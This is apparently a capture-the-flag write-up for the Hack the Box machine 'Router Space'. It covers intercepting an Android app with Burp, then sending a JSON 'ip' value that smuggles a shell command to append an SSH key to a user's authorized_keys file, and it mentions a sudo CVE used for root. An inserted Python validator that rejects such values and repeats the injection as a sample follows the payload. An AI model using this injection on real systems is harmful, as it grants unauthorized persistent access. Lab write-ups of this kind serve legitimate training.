
Hack the Box Router Space

  • BlueDolphin
  • Jul 6, 2022
  • 1 min read
Engagement flow


Enumeration
  1. Port discovery

  2. Web enumeration

  3. APK download



Browsing to the website, we see two options: a download and a "get started now".


We download the provided apk.


From this we install and run Anbox on our target. Once Anbox is open, we have to install the actual .apk.


User

We have to change our network information in order to intercept and proxy the request with Burp Suite.




adb shell settings put global http_proxy 192.168.250.1:8080



This did not work. After some review I realized the host was routerspace.htb and this needed to be added to the /etc/hosts file.





I was not able to gain a reverse shell so I injected my SSH key instead.



{"ip":"0.0.0.0 | echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCu8ID9aG93wVDfA3M7x6McWMDGvzVC4LlWjoDZtJ33Xpzi7483Dxt4+WczJdCAlWJKw1In4Orc1QcINCHBy6hK0UteKU3OevHn9IhpyoZF1FsFi/zo6brldA4pSTOBBT6zDf3VzVtgEwkRe5YaLZLMoD/lBvYLKyboJcQ90zTwBcNEL029b5a1YLx/ZZcTgaZEOKrC7rck9l3uu9rW8pqGTrm/kkV7ad+CrH4tHil4uNnkVSQp6BA1oQh1xAuCvq494zZu5Z+sqOsHzMKp7U4ZvAG1vKxZdMSyKYp13kftK2Yj+dWDpIYZZqy0tqz1duSmgd7LK+dxc7wGOV6+FPqp4YcnY4xfnbKwh1WPZnL7EvYIzHqI4IYww7IMYBw2R+/+CtQpFj+rmX0FHUEPpu9YSjvC4o1N7pzo6/F8pIn7HjEiOg1vcwotCF3RM5UG2fkX0PdHJTXH9EL8lm351qkilf00ZFsZ8ovlvVtoIdcN0mwuh9I/1GeyDey2kmYC9c= kali@kali' >> /home/paul/.ssh/authorized_keys"}
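The request above works because the "ip" value reaches a shell unvalidated. As an added example (not code from this write-up or from the target application), here is how a handler could parse that field strictly and build a shell-free argument vector. The command name, function names and sample bodies are assumptions; the samples are constructed and use a placeholder instead of a real key.

```python
import ipaddress
import json

# Hypothetical command run with the address; the page does not say what
# the real endpoint executes.
HYPOTHETICAL_CMD = ["ping", "-c", "1"]

class RejectedInput(ValueError):
    """Raised when the "ip" field is not a plain IP address."""

def parse_ip_field(raw_body):
    """Return the canonical IP string from a JSON body, or raise RejectedInput."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise RejectedInput("body is not JSON") from exc
    value = body.get("ip") if isinstance(body, dict) else None
    if not isinstance(value, str):
        raise RejectedInput("ip must be a string")
    try:
        addr = ipaddress.ip_address(value)  # bare IPv4/IPv6 literal only
    except ValueError as exc:
        raise RejectedInput("not an IP address: %r" % value[:40]) from exc
    # Edge case: an IPv6 zone id ("fe80::1%eth0") is free-form text after
    # the "%", so metacharacters could ride along inside it. Refuse it.
    if getattr(addr, "scope_id", None):
        raise RejectedInput("IPv6 zone ids are not accepted")
    return str(addr)

def build_argv(raw_body):
    """Argument vector for subprocess.run(argv), which uses no shell."""
    # "--" ends option parsing, so the value can never be read as a flag.
    return HYPOTHETICAL_CMD + ["--", parse_ip_field(raw_body)]

# Constructed sample bodies; the second has the shape of the request above.
SAMPLES = [
    '{"ip":"0.0.0.0"}',
    '{"ip":"0.0.0.0 | echo \'PLACEHOLDER_KEY\' >> /home/paul/.ssh/authorized_keys"}',
    '{"ip":["0.0.0.0"]}',
]

def triage(bodies):
    """Return (body, verdict) pairs, e.g. when replaying captured request bodies."""
    results = []
    for raw in bodies:
        try:
            results.append((raw, "ok: " + " ".join(build_argv(raw))))
        except RejectedInput as exc:
            results.append((raw, "rejected: " + str(exc)))
    return results

if __name__ == "__main__":
    for _, verdict in triage(SAMPLES):
        print(verdict)
```

Running the same parser over stored request bodies also works as a detection: any "ip" value it rejects is worth a look.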



Root

From here we are not able to get the linpeas script uploaded, so we pivot and enumerate manually. Checking the sudo version and researching it shows us a known CVE.


We copy the 3 files onto our target machine, run make followed by exploit, and we are root!

